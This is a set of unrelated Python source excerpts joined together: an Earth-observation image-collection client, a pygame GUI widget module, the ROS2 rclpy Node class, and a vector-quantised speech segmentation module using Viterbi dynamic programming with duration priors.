node_id = builder.process(process_id, arguments)
return cls(node_id, builder, session, metadata={})
def _filter_temporal(self, start: str, end: str) -> 'ImageCollection':
return self.graph_add_process(
process_id='filter_temporal',
args={
'data': {'from_node': self.node_id},
'extent': [start, end]
}
)
def filter_bbox(self, west, east, north, south, crs=None, base=None, height=None) -> 'ImageCollection':
extent = {'west': west, 'east': east, 'north': north, 'south': south}
extent.update(dict_no_none(crs=crs, base=base, height=height))
return self.graph_add_process(
process_id='filter_bbox',
args={
'data': {'from_node': self.node_id},
'extent': extent
}
)
def filter_bands(self, bands: Union[List[Union[str, int]], str]) -> 'ImageCollection':
"""
Filter the imagery by the given bands
:param bands: list of band names, common names or band indices. Single band name can also be given as string.
:return a DataCube instance
"""
if isinstance(bands, str):
bands = [bands]
bands = [self.metadata.band_dimension.band_name(b) for b in bands]
im = self.graph_add_process(
process_id='filter_bands',
args={
'data': {'from_node': self.node_id},
'bands': [b for b in bands if b in self.metadata.band_names],
'common_names': [b for b in bands if b in self.metadata.band_common_names]
})
if im.metadata:
im.metadata = im.metadata.filter_bands(bands)
return im
band_filter = legacy_alias(filter_bands, "band_filter")
def band(self, band: Union[str, int]) -> 'ImageCollection':
"""Filter the imagery by the given bands
:param band: band name, band common name or band index.
:return An ImageCollection instance
"""
process_id = 'reduce'
band_index = self.metadata.get_band_index(band)
args = {
'data': {'from_node': self.node_id},
'dimension': self.metadata.band_dimension.name,
'reducer': {
'callback': {
'r1': {
'arguments': {
'data': {
'from_argument': 'data'
},
'index': band_index
},
'process_id': 'array_element',
'result': True
}
}
}
}
return self.graph_add_process(process_id, args)
def resample_spatial(self, resolution: Union[float, Tuple[float, float]],
projection: Union[int, str] = None, method: str = 'near', align: str = 'upper-left'):
return self.graph_add_process('resample_spatial', {
'data': {'from_node': self.node_id},
'resolution': resolution,
'projection': projection,
'method': method,
'align': align
})
def subtract(self, other:Union[ImageCollection,Union[int,float]]):
"""
Subtract other from this datacube, so the result is: this - other
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this - other
"""
operator = "subtract"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def divide(self, other:Union[ImageCollection,Union[int,float]]):
"""
Subtraction other from this datacube, so the result is: this - other
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this - other
"""
operator = "divide"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def product(self, other:Union[ImageCollection,Union[int,float]]):
"""
Multiply other with this datacube, so the result is: this * other
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this - other
"""
operator = "product"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def logical_or(self, other: ImageCollection):
"""
Apply element-wise logical `or` operation
:param other:
:return ImageCollection: logical_or(this, other)
"""
return self._reduce_bands_binary(operator='or', other=other,arg_name='expressions')
def logical_and(self, other: ImageCollection):
"""
Apply element-wise logical `and` operation
:param other:
:return ImageCollection: logical_and(this, other)
"""
return self._reduce_bands_binary(operator='and', other=other,arg_name='expressions')
def __invert__(self):
"""
:return:
"""
operator = 'not'
my_builder = self._get_band_graph_builder()
new_builder = None
extend_previous_callback_graph = my_builder is not None
# TODO: why does these `add_process` calls use "expression" instead of "data" like the other cases?
if not extend_previous_callback_graph:
new_builder = GraphBuilder()
# TODO merge both process graphs?
new_builder.add_process(operator, expression={'from_argument': 'data'}, result=True)
else:
new_builder = my_builder.copy()
current_result = new_builder.find_result_node_id()
new_builder.processes[current_result]['result'] = False
new_builder.add_process(operator, expression={'from_node': current_result}, result=True)
return self._create_reduced_collection(new_builder, extend_previous_callback_graph)
def __ne__(self, other: Union[ImageCollection, Union[int, float]]):
return self._reduce_bands_binary_xy('neq', other)
def __eq__(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pixelwise comparison of this data cube with another cube or constant.
:param other: Another data cube, or a constant
:return:
"""
return self._reduce_bands_binary_xy('eq', other)
def __gt__(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pairwise comparison of the bands in this data cube with the bands in the 'other' data cube.
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this + other
"""
return self._reduce_bands_binary_xy('gt', other)
def __ge__(self, other:Union[ImageCollection,Union[int,float]]):
return self._reduce_bands_binary_xy('gte', other)
def __lt__(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pairwise comparison of the bands in this data cube with the bands in the 'other' data cube.
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this + other
"""
return self._reduce_bands_binary_xy('lt', other)
def __le__(self, other:Union[ImageCollection,Union[int,float]]):
return self._reduce_bands_binary_xy('lte',other)
def _create_reduced_collection(self, callback_graph_builder, extend_previous_callback_graph):
if not extend_previous_callback_graph:
# there was no previous reduce step
args = {
'data': {'from_node': self.node_id},
'dimension': self.metadata.band_dimension.name,
'reducer': {
'callback': callback_graph_builder.processes
}
}
return self.graph_add_process("reduce", args)
else:
process_graph_copy = self.builder.shallow_copy()
process_graph_copy.processes[self.node_id]['arguments']['reducer']['callback'] = callback_graph_builder.processes
# now current_node should be a reduce node, let's modify it
# TODO: properly update metadata of reduced cube? #metadatareducedimension
return ImageCollectionClient(self.node_id, process_graph_copy, self.session, metadata=self.metadata)
def __truediv__(self, other):
return self.divide(other)
def __sub__(self, other):
return self.subtract(other)
def __radd__(self, other):
return self.add(other)
def __add__(self, other):
return self.add(other)
def __neg__(self):
return self.product(-1)
def __mul__(self, other):
return self.product(other)
def __rmul__(self, other):
return self.product(other)
def __or__(self, other):
return self.logical_or(other)
def __and__(self, other):
return self.logical_and(other)
def add(self, other:Union[ImageCollection,Union[int,float]]):
"""
Pairwise addition of the bands in this data cube with the bands in the 'other' data cube.
The number of bands in both data cubes has to be the same.
:param other:
:return ImageCollection: this + other
"""
operator = "sum"
if isinstance(other, int) or isinstance(other, float):
return self._reduce_bands_binary_const(operator, other)
elif isinstance(other, ImageCollection):
return self._reduce_bands_binary(operator, other)
else:
raise ValueError("Unsupported right-hand operand: " + str(other))
def _reduce_bands_binary(self, operator, other: 'ImageCollectionClient',arg_name='data'):
# first we create the callback
my_builder = self._get_band_graph_builder()
other_builder = other._get_band_graph_builder()
merged = GraphBuilder.combine(
operator=operator,
first=my_builder or {'from_argument': 'data'},
second=other_builder or {'from_argument': | |
<filename>dan_gui.py
import pygame
import math
# RGB colour definitions for referring to later
black = (0, 0, 0)
white = (255, 255, 255)
grey = (100, 100, 100)
darkGrey = (50, 50, 50)
light_grey = (130, 130, 130)
# Base/parent class used for all other classes
# Should be treated as abstract - there should never be an Element object, only objects that are children of Element
class Element:
# x, y = the x and y position of the top left of the element in pixels
# width, height = width + height of the element in pixels
# font = The Pygame Font object used for rendering text
# bg_colour = The colour of background parts of the element as an RGB tuple
# text_colour = The colour of text of the element as an RGB tuple
def __init__(self, x, y, width, height, font, back_colour=grey, text_colour=black):
# x and y can be a decimal value as these are not the values used in drawing
self.x = x
self.y = y
self.width = width
self.height = height
# Pygame Rect object that covers the entire object, used for collision detection with mouse
self.rect = pygame.Rect(self.x, self.y, self.width, self.height)
# x2 and y2 are the co-ords for the bottom right of the element
self.x2 = self.x + self.width
self.y2 = self.y + self.height
self.font = font
self.bg_colour = back_colour
self.text_colour = text_colour
@property
def bg_colour(self):
return self._bg_colour
# Validation check before setting background colour to new value
# Prevents crash due to invalid colour where one element is greater than 255 or less than 0
@bg_colour.setter
def bg_colour(self, new_colour):
valid = True
for n in new_colour:
if n > 255 or n < 0:
valid = False
if valid:
self._bg_colour = new_colour
# Default methods, child classes override the ones they need
# Uses 'pass' keyword: method does nothing
# Default draw method
# Parameter screen is a Pygame surface object that will be drawn to
def draw(self, screen):
pass
# Method that deals with clicking input, takes in the mouse position as 2 co-ords
def on_click(self, mouse_x, mouse_y):
pass
# Method that deals with mouse button being released
def on_unclick(self):
pass
# Method that deals with a keyboard key being pressed
# Takes in the pygame key code as a parameter
def on_char_typed(self, key_pressed):
pass
# Method that deals with a keyboard key being released
# Takes in the pygame key code as a parameter
def on_key_up(self, key_up):
pass
# Method for things that should be run once a frame
# Takes in the mouse pos as 2 co-ords as parameters
def update(self, mouse_x, mouse_y):
pass
# Method that is called when an Element object is added to a Menu or Group object
# For explanation, see methods where overriden
def on_menu_add(self):
pass
# Class for a drop-down list that displays a list of pre-defined options
# Inherits all methods and attributes from Element
class DropDown(Element):
# Static constant for how wide the button at the side of the list should be
buttonWidth = 30
# data = A list of possible options - strings
# font = The pygame Font object used to render text
def __init__(self, x, y, width, height, data, font):
# Calls its parent's init method to get all parent attributes
Element.__init__(self, x, y, width, height, font)
self.bg_colour = light_grey
self.data = data
self.current_opt = 0
self.button_text = self.font.render(self.data[self.current_opt], 1, black)
# Make text objects for all data objects
self.options = data
# Open is a boolean that tracks whether the list should be drawn
self.open = False
# Pygame Rect object that covers the button
self.button_rect = pygame.Rect(self.x2, self.y, DropDown.buttonWidth, self.height)
# Pygame Rect object that covers the menu
self.menu_rect = pygame.Rect(self.x, self.y2, self.width, self.height*len(self.data))
def on_menu_add(self):
self.button_rect = pygame.Rect(self.x2, self.y, DropDown.buttonWidth, self.height)
self.menu_rect = pygame.Rect(self.x, self.y2, self.width, self.height*len(self.data))
def on_click(self, mouse_x, mouse_y):
# Returns true if an option changed
changed = False
# Checks if the menu is open
if self.open:
# Checks if clicking button
if self.button_rect.collidepoint(mouse_x, mouse_y):
# Closes the drop down menu
self.open = False
# If clicking the menu, select the option they clicked on, then close the menu
if self.menu_rect.collidepoint(mouse_x, mouse_y):
self.select_option(mouse_y)
self.open = False
# Option has been changed
changed = True
else:
# Checks if clicking button
if self.button_rect.collidepoint(mouse_x, mouse_y):
# Open the drop down menu
self.open = True
return changed
# Using property modifier for getter and setter
@property
def options(self):
return self.__options
# Uses setter to make sure when options change, text objects are automatically created
# Takes in a list of strings as a parameter
@options.setter
def options(self, data):
options = []
# For each string in data, make a text object from it
for i in range(len(data)):
text = self.font.render(data[i], 1, black)
options.append(text)
self.__options = options
# Recreates the collision Rect object to account for longer menu box
self.menu_rect = pygame.Rect(self.x, self.y2, self.width, self.height * (len(self.data)))
# Takes in the y co-ord of the mouse
# Subtracts from the y co-ord so the top of the first option box is at 0
# Divides by the height of each option box then rounds it down
def select_option(self, mouse_y):
self.current_opt = math.floor((mouse_y - self.y - self.height) / self.height)
# Changes the button text to the currently selected option
self.change_text(self.data[self.current_opt])
# Changes the text in the button to string new_text
def change_text(self, new_text):
self.button_text = self.font.render(new_text, 1, black)
# Draws the drop-down box
def draw(self, screen):
# Draws the background of the box
pygame.draw.rect(screen, self.bg_colour, (self.x, self.y, self.width, self.height))
# Draws the background for the button next to the box
pygame.draw.rect(screen, darkGrey, ((self.x + self.width), self.y, DropDown.buttonWidth, self.height))
# Draws the triangle inside the button
pygame.draw.polygon(screen, black, (((self.x + self.width + (DropDown.buttonWidth / 2)),
(self.y + self.height - 3)), ((self.x + self.width + 3), (self.y + 3)),
((self.x2 + DropDown.buttonWidth - 3), (self.y + 3))))
# Draw text in box
screen.blit(self.button_text, (self.x + 2, self.y + 2))
# Draw border around box
pygame.draw.lines(screen, black, True, ((self.x, self.y), (self.x2, self.y), (self.x2, self.y2), (self.x, self.y2)))
# Displays whole list if open
if self.open:
# For each option available, draw a box with text in
for i in range(len(self.data)):
current_y = self.y + ((i+1)*self.height)
# Render a box
pygame.draw.rect(screen, self.bg_colour, (self.x, current_y, self.width, self.height))
# Render the text
screen.blit(self.options[i], (self.x + 2, current_y + 2))
# Class for a button with a text label
# Inherits all methods and attributes from Element
class Button(Element):
# text = The text rendered as the button's label
def __init__(self, x, y, font, text):
self.text = text
# Width and Height are generated based on the width and height of the text
self.width = font.size(text)[0] + 5
self.height = font.size(text)[1] + 5
Element.__init__(self, x, y, self.width, self.height, font)
self.bg_colour = light_grey
# Makes a text object of the label text
self.txt_obj = self.font.render(self.text, 1, self.text_colour)
# Clicked is a boolean value which is true when the user has clicked on the button
self.clicked = False
# The number of frames since the button was last clicked
self.last_click = 0
# The width of the black border around the button in pixels
self.border = 1
# When this is true, the button appears greyed out and cannot be clicked
self.grey = False
# Using getters and setters for attribute 'grey'
@property
def grey(self):
return self._grey
# Sets grey_change to true when grey has been changed
# The part of update that deals with colour should only be run once, not on every update
@grey.setter
def grey(self, new_grey):
self._grey = new_grey
self.update_grey()
# When mouse button released, clicked = false
def on_unclick(self):
self.clicked = False
# When mouse clicked, checks if mouse is inside button
# Checks if button has not been pressed in last 20 frames
# Checks if button is not greyed out
# If all True, button | |
# Copyright 2016 Open Source Robotics Foundation, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import math
from typing import Any
from typing import Callable
from typing import Dict
from typing import Iterator
from typing import List
from typing import Optional
from typing import Tuple
from typing import TypeVar
from typing import Union
import weakref
from rcl_interfaces.msg import FloatingPointRange
from rcl_interfaces.msg import IntegerRange
from rcl_interfaces.msg import Parameter as ParameterMsg
from rcl_interfaces.msg import ParameterDescriptor
from rcl_interfaces.msg import ParameterEvent
from rcl_interfaces.msg import ParameterValue
from rcl_interfaces.msg import SetParametersResult
from rclpy.callback_groups import CallbackGroup
from rclpy.callback_groups import MutuallyExclusiveCallbackGroup
from rclpy.callback_groups import ReentrantCallbackGroup
from rclpy.client import Client
from rclpy.clock import Clock
from rclpy.clock import ROSClock
from rclpy.constants import S_TO_NS
from rclpy.context import Context
from rclpy.exceptions import InvalidParameterValueException
from rclpy.exceptions import NotInitializedException
from rclpy.exceptions import ParameterAlreadyDeclaredException
from rclpy.exceptions import ParameterImmutableException
from rclpy.exceptions import ParameterNotDeclaredException
from rclpy.executors import Executor
from rclpy.expand_topic_name import expand_topic_name
from rclpy.guard_condition import GuardCondition
from rclpy.handle import Handle
from rclpy.handle import InvalidHandle
from rclpy.impl.implementation_singleton import rclpy_implementation as _rclpy
from rclpy.logging import get_logger
from rclpy.parameter import Parameter, PARAMETER_SEPARATOR_STRING
from rclpy.parameter_service import ParameterService
from rclpy.publisher import Publisher
from rclpy.qos import qos_profile_parameter_events
from rclpy.qos import qos_profile_services_default
from rclpy.qos import QoSProfile
from rclpy.qos_event import PublisherEventCallbacks
from rclpy.qos_event import SubscriptionEventCallbacks
from rclpy.service import Service
from rclpy.subscription import Subscription
from rclpy.time_source import TimeSource
from rclpy.timer import Rate
from rclpy.timer import Timer
from rclpy.type_support import check_for_type_support
from rclpy.utilities import get_default_context
from rclpy.validate_full_topic_name import validate_full_topic_name
from rclpy.validate_namespace import validate_namespace
from rclpy.validate_node_name import validate_node_name
from rclpy.validate_parameter_name import validate_parameter_name
from rclpy.validate_topic_name import validate_topic_name
from rclpy.waitable import Waitable
HIDDEN_NODE_PREFIX = '_'
# Used for documentation purposes only
MsgType = TypeVar('MsgType')
SrvType = TypeVar('SrvType')
SrvTypeRequest = TypeVar('SrvTypeRequest')
SrvTypeResponse = TypeVar('SrvTypeResponse')
# Re-export exception defined in _rclpy C extension.
# `Node.get_*_names_and_types_by_node` methods may raise this error.
NodeNameNonExistentError = _rclpy.NodeNameNonExistentError
class Node:
PARAM_REL_TOL = 1e-6
"""
A Node in the ROS graph.
A Node is the primary entrypoint in a ROS system for communication.
It can be used to create ROS entities such as publishers, subscribers, services, etc.
"""
def __init__(
self,
node_name: str,
*,
context: Context = None,
cli_args: List[str] = None,
namespace: str = None,
use_global_arguments: bool = True,
enable_rosout: bool = True,
start_parameter_services: bool = True,
parameter_overrides: List[Parameter] = None,
allow_undeclared_parameters: bool = False,
automatically_declare_parameters_from_overrides: bool = False
) -> None:
"""
Create a Node.
:param node_name: A name to give to this node. Validated by :func:`validate_node_name`.
:param context: The context to be associated with, or ``None`` for the default global
context.
:param cli_args: A list of strings of command line args to be used only by this node.
These arguments are used to extract remappings used by the node and other ROS specific
settings, as well as user defined non-ROS arguments.
:param namespace: The namespace to which relative topic and service names will be prefixed.
Validated by :func:`validate_namespace`.
:param use_global_arguments: ``False`` if the node should ignore process-wide command line
args.
:param enable_rosout: ``False`` if the node should ignore rosout logging.
:param start_parameter_services: ``False`` if the node should not create parameter
services.
:param parameter_overrides: A list of overrides for initial values for parameters declared
on the node.
:param allow_undeclared_parameters: True if undeclared parameters are allowed.
This flag affects the behavior of parameter-related operations.
:param automatically_declare_parameters_from_overrides: If True, the "parameter overrides"
will be used to implicitly declare parameters on the node during creation.
"""
self.__handle = None
self._context = get_default_context() if context is None else context
self._parameters: dict = {}
self.__publishers: List[Publisher] = []
self.__subscriptions: List[Subscription] = []
self.__clients: List[Client] = []
self.__services: List[Service] = []
self.__timers: List[Timer] = []
self.__guards: List[GuardCondition] = []
self.__waitables: List[Waitable] = []
self._default_callback_group = MutuallyExclusiveCallbackGroup()
self._rate_group = ReentrantCallbackGroup()
self._parameters_callback = None
self._allow_undeclared_parameters = allow_undeclared_parameters
self._parameter_overrides = {}
self._descriptors = {}
namespace = namespace or ''
if not self._context.ok():
raise NotInitializedException('cannot create node')
try:
self.__handle = Handle(_rclpy.rclpy_create_node(
node_name,
namespace,
self._context.handle,
cli_args,
use_global_arguments,
enable_rosout
))
except ValueError:
# these will raise more specific errors if the name or namespace is bad
validate_node_name(node_name)
# emulate what rcl_node_init() does to accept '' and relative namespaces
if not namespace:
namespace = '/'
if not namespace.startswith('/'):
namespace = '/' + namespace
validate_namespace(namespace)
# Should not get to this point
raise RuntimeError('rclpy_create_node failed for unknown reason')
with self.handle as capsule:
self._logger = get_logger(_rclpy.rclpy_get_node_logger_name(capsule))
self.__executor_weakref = None
self._parameter_event_publisher = self.create_publisher(
ParameterEvent, 'parameter_events', qos_profile_parameter_events)
with self.handle as capsule:
self._parameter_overrides = _rclpy.rclpy_get_node_parameters(Parameter, capsule)
# Combine parameters from params files with those from the node constructor and
# use the set_parameters_atomically API so a parameter event is published.
if parameter_overrides is not None:
self._parameter_overrides.update({p.name: p for p in parameter_overrides})
if automatically_declare_parameters_from_overrides:
self._parameters.update(self._parameter_overrides)
self._descriptors.update({p: ParameterDescriptor() for p in self._parameters})
# Clock that has support for ROS time.
# Note: parameter overrides and parameter event publisher need to be ready at this point
# to be able to declare 'use_sim_time' if it was not declared yet.
self._clock = ROSClock()
self._time_source = TimeSource(node=self)
self._time_source.attach_clock(self._clock)
if start_parameter_services:
self._parameter_service = ParameterService(self)
@property
def publishers(self) -> Iterator[Publisher]:
"""Get publishers that have been created on this node."""
yield from self.__publishers
@property
def subscriptions(self) -> Iterator[Subscription]:
"""Get subscriptions that have been created on this node."""
yield from self.__subscriptions
@property
def clients(self) -> Iterator[Client]:
"""Get clients that have been created on this node."""
yield from self.__clients
@property
def services(self) -> Iterator[Service]:
"""Get services that have been created on this node."""
yield from self.__services
@property
def timers(self) -> Iterator[Timer]:
"""Get timers that have been created on this node."""
yield from self.__timers
@property
def guards(self) -> Iterator[GuardCondition]:
"""Get guards that have been created on this node."""
yield from self.__guards
@property
def waitables(self) -> Iterator[Waitable]:
"""Get waitables that have been created on this node."""
yield from self.__waitables
@property
def executor(self) -> Optional[Executor]:
"""Get the executor if the node has been added to one, else return ``None``."""
if self.__executor_weakref:
return self.__executor_weakref()
return None
@executor.setter
def executor(self, new_executor: Executor) -> None:
"""Set or change the executor the node belongs to."""
current_executor = self.executor
if current_executor == new_executor:
return
if current_executor is not None:
current_executor.remove_node(self)
if new_executor is None:
self.__executor_weakref = None
else:
new_executor.add_node(self)
self.__executor_weakref = weakref.ref(new_executor)
def _wake_executor(self):
executor = self.executor
if executor:
executor.wake()
@property
def context(self) -> Context:
"""Get the context associated with the node."""
return self._context
@property
def default_callback_group(self) -> CallbackGroup:
"""
Get the default callback group.
If no other callback group is provided when the a ROS entity is created with the node,
then it is added to the default callback group.
"""
return self._default_callback_group
@property
def handle(self):
"""
Get the handle to the underlying `rcl_node_t`.
Cannot be modified after node creation.
:raises: AttributeError if modified after creation.
"""
return self.__handle
@handle.setter
def handle(self, value):
raise AttributeError('handle cannot be modified after node creation')
def get_name(self) -> str:
"""Get the name of the node."""
with self.handle as capsule:
return _rclpy.rclpy_get_node_name(capsule)
def get_namespace(self) -> str:
"""Get the namespace of the node."""
with self.handle as capsule:
return _rclpy.rclpy_get_node_namespace(capsule)
def get_clock(self) -> Clock:
"""Get the clock used by the node."""
return self._clock
def get_logger(self):
"""Get the nodes logger."""
return self._logger
def declare_parameter(
self,
name: str,
value: Any = None,
descriptor: ParameterDescriptor = ParameterDescriptor(),
ignore_override: bool = False
) -> Parameter:
"""
Declare and initialize a parameter.
This method, if successful, will result in any callback registered with
:func:`set_parameters_callback` to be called.
:param name: Fully-qualified name of the parameter, including its namespace.
:param value: Value of the parameter to declare.
:param descriptor: Descriptor for the parameter to declare.
:param ignore_override: True if overrides shall not be taken into account; False otherwise.
:return: Parameter with the effectively assigned value.
:raises: ParameterAlreadyDeclaredException if the parameter had already been declared.
:raises: InvalidParameterException if the parameter name is invalid.
:raises: InvalidParameterValueException if the registered callback rejects the parameter.
"""
return self.declare_parameters('', [(name, value, descriptor)], ignore_override)[0]
def declare_parameters(
self,
namespace: str,
parameters: List[Union[
Tuple[str],
Tuple[str, Any],
Tuple[str, Any, ParameterDescriptor],
]],
ignore_override: | |
<reponame>kamperh/vqwordseg<filename>vqwordseg/algorithms.py
"""
VQ phone and word segmentation algorithms.
Author: <NAME>
Contact: <EMAIL>
Date: 2021
"""
from pathlib import Path
from scipy.spatial import distance
from scipy.special import factorial
from scipy.stats import gamma
from tqdm import tqdm
import numpy as np
import sys
sys.path.append(str(Path(__file__).parent/"../../dpdp_aernn"))
#-----------------------------------------------------------------------------#
# PHONE DURATION PRIORS: NEGATIVE LOG PROB (WANT TO MINIMIZE) #
#-----------------------------------------------------------------------------#
def neg_chorowski(dur, weight=None):
score = -(dur - 1)
if weight is None:
return score
else:
return -weight*score
def neg_log_poisson(dur, poisson_param=5, weight=None):
return -(
-poisson_param + dur*np.log(poisson_param) - np.log(factorial(dur))
)
histogram = np.array([
4.94283846e-05, 7.72517818e-03, 3.58084730e-02, 1.00731859e-01,
1.14922589e-01, 1.16992203e-01, 1.11386068e-01, 9.68349889e-02,
8.19379115e-02, 6.76403527e-02, 5.46630100e-02, 4.30616898e-02,
3.39445445e-02, 2.62512556e-02, 2.02767989e-02, 1.58633226e-02,
1.24495750e-02, 9.71666374e-03, 7.93086404e-03, 6.36669484e-03,
5.32550983e-03, 4.42463766e-03, 3.77887973e-03, 3.22560071e-03,
2.67072723e-03, 2.32632301e-03, 2.10469251e-03, 1.72521007e-03,
1.49560725e-03, 1.21179265e-03, 9.85378764e-04, 8.83333067e-04,
7.92448618e-04, 6.61702568e-04, 5.58062407e-04, 4.75150278e-04,
3.84265829e-04, 3.49187620e-04, 2.67869955e-04, 2.42358531e-04,
1.81768898e-04, 2.07280322e-04, 1.56257474e-04, 1.37123905e-04,
1.16395874e-04, 1.16395874e-04, 7.01564169e-05, 7.33453449e-05,
5.74007047e-05, 7.81287370e-05, 7.81287370e-05, 3.18892804e-05,
3.18892804e-05, 1.91335682e-05, 3.50782084e-05, 2.23224963e-05,
2.07280322e-05, 1.43501762e-05, 2.23224963e-05, 6.37785608e-06,
1.27557122e-05, 1.43501762e-05, 6.37785608e-06, 7.97232011e-06,
3.18892804e-06, 7.97232011e-06, 1.11612481e-05, 4.78339206e-06,
3.18892804e-06, 3.18892804e-06, 3.18892804e-06, 3.18892804e-06
])
histogram = histogram/np.sum(histogram)
def neg_log_hist(dur, weight=None):
score = -np.log(0 if dur >= len(histogram) else histogram[dur])
if weight is None:
return score
else:
return weight*(score) + np.log(np.sum(histogram**weight))
# Cache Gamma
# shape, loc, scale = (3, 0, 2.6)
shape, loc, scale = (3, 0, 2.5)
gamma_cache = []
for dur in range(200):
gamma_cache.append(gamma.pdf(dur, shape, loc, scale))
def neg_log_gamma(dur, weight=None):
# (
# 2.967152765811849, -0.004979890790653328, 2.6549778308011014
# )
if dur < 200:
score = -np.log(gamma_cache[dur])
else:
score = -np.log(gamma.pdf(dur, shape, loc, scale))
if weight is None:
return score
else:
return weight*score + np.log(np.sum(gamma_cache**weight))
#-----------------------------------------------------------------------------#
# DYNAMIC PROGRAMMING PENALIZED SEGMENTATION #
#-----------------------------------------------------------------------------#
def get_segment_intervals(n_total, n_max_frames):
indices = [None]*int((n_total**2 + n_total)/2)
for cur_start in range(n_total):
for cur_end in range(cur_start, min(n_total, cur_start +
n_max_frames)):
cur_end += 1
t = cur_end
i = int(t*(t - 1)/2)
indices[i + cur_start] = (cur_start, cur_end)
return indices
def custom_viterbi(costs, n_frames):
"""
Viterbi segmentation of an utterance of length `n_frames` based on `costs`.
Parameters
----------
costs : n_frames*(n_frames + 1)/2 vector
For t = 1, 2, ..., N the entries costs[i:i + t] contains the costs of
seq[0:t] up to seq[t - 1:t], with i = t(t - 1)/2. Written out: costs =
[cost(seq[0:1]), cost(seq[0:2]), cost(seq[1:2]), cost(seq[0:3]), ...,
cost(seq[N-1:N])].
Return
------
(summed_cost, boundaries) : (float, vector of bool)
"""
# Initialise
boundaries = np.zeros(n_frames, dtype=bool)
boundaries[-1] = True
alphas = np.ones(n_frames)
alphas[0] = 0.0
# Forward filtering
i = 0
for t in range(1, n_frames):
alphas[t] = np.min(
costs[i:i + t] + alphas[:t]
)
i += t
# print("alphas: {}".format(alphas))
# Backward segmentation
t = n_frames
summed_cost = 0.0
while True:
i = int(0.5*(t - 1)*t)
q_t_min_list = (
costs[i:i + t] + alphas[:t]
)
q_t_min_list = q_t_min_list[::-1]
q_t = np.argmin(q_t_min_list) + 1
# print("-"*39)
# print("t = {}".format(t))
# print("q_t_min_list: {}".format(q_t_min_list))
# print("arg min: {}".format(q_t))
# print("Cost: {:.4f}".format(costs[i + t - q_t]))
summed_cost += costs[i + t - q_t]
if t - q_t - 1 < 0:
break
boundaries[t - q_t - 1] = True
t = t - q_t
# print("Utterance loss: {:.4f}".format(summed_cost))
return summed_cost, boundaries
def dp_penalized(embedding, z, n_min_frames=0, n_max_frames=15,
dur_weight=20**2, dur_weight_func=neg_chorowski, model_eos=False):
# Hyperparameters
# count_weight = 0
# Distances between each z and each embedding (squared Euclidean)
embedding_distances = distance.cdist(z, embedding, metric="sqeuclidean")
# print("embedding_distances shape: {}".format(embedding_distances.shape))
# Costs for segment intervals
segment_intervals = get_segment_intervals(z.shape[0], n_max_frames)
costs = np.inf*np.ones(len(segment_intervals))
i_eos = segment_intervals[-1][-1]
for i_seg, interval in enumerate(segment_intervals):
if interval is None:
continue
i_start, i_end = interval
dur = i_end - i_start
if dur < n_min_frames:
continue
cost = np.min(
np.sum(embedding_distances[i_start:i_end, :], axis=0)
) + dur_weight*dur_weight_func(dur) # + count_weight
# End-of-sequence
if model_eos:
alpha = 0.1
K = 50
if i_end == i_eos:
cost += -np.log(alpha)
else:
cost += -np.log((1 - alpha)/K)
costs[i_seg] = cost
# Viterbi segmentation
summed_cost, boundaries = custom_viterbi(costs, z.shape[0])
# Code assignments
segmented_codes = []
j_prev = 0
for j in np.where(boundaries)[0]:
i_start = j_prev
i_end = j + 1
code = np.argmin(np.sum(embedding_distances[i_start:i_end, :], axis=0))
segmented_codes.append((i_start, i_end, code))
j_prev = j + 1
return boundaries, segmented_codes
def dp_penalized_hsmm(embedding, z, n_min_frames=0, n_max_frames=15,
dur_weight=20**2, dur_weight_func=neg_log_gamma, model_eos=False):
"""Segmentation using a hidden semi-Markov model (HSMM)."""
# Hyperparameters
# count_weight = 0
sigma = 1.0/dur_weight
D = z.shape[1]
# Distances between each z and each embedding (squared Euclidean)
embedding_distances = distance.cdist(z, embedding, metric="sqeuclidean")
# print("embedding_distances shape: {}".format(embedding_distances.shape))
# Costs for segment intervals
segment_intervals = get_segment_intervals(z.shape[0], n_max_frames)
costs = np.inf*np.ones(len(segment_intervals))
i_eos = segment_intervals[-1][-1]
for i_seg, interval in enumerate(segment_intervals):
if interval is None:
continue
i_start, i_end = interval
dur = i_end - i_start
if dur < n_min_frames:
continue
cost = (
1/(2*sigma**2)*np.min(
np.sum(embedding_distances[i_start:i_end, :], axis=0)
)
+ 0.5*dur*D*np.log(2*np.pi) + 0.5*dur*D*np.log(sigma**2)
+ dur_weight_func(dur) # + count_weight
)
# End-of-sequence
if model_eos:
alpha = 0.1 # 0.1
K = 50
if i_end == i_eos:
cost += -np.log(alpha)
else:
cost += -np.log((1 - alpha)/K)
costs[i_seg] = cost
# Viterbi segmentation
summed_cost, boundaries = custom_viterbi(costs, z.shape[0])
# Code assignments
segmented_codes = []
j_prev = 0
for j in np.where(boundaries)[0]:
i_start = j_prev
i_end = j + 1
code = np.argmin(np.sum(embedding_distances[i_start:i_end, :], axis=0))
segmented_codes.append((i_start, i_end, code))
j_prev = j + 1
return boundaries, segmented_codes
#-----------------------------------------------------------------------------#
# N-SEG. CONSTRAINED DYNAMIC PROGRAMMING PENALIZED SEGMENTATION #
#-----------------------------------------------------------------------------#
def custom_viterbi_n_segments(costs, n_frames, n_segments):
"""
Viterbi segmentation of an utterance of length `n_frames` based on `costs`
constrained to produce `n_segments`.
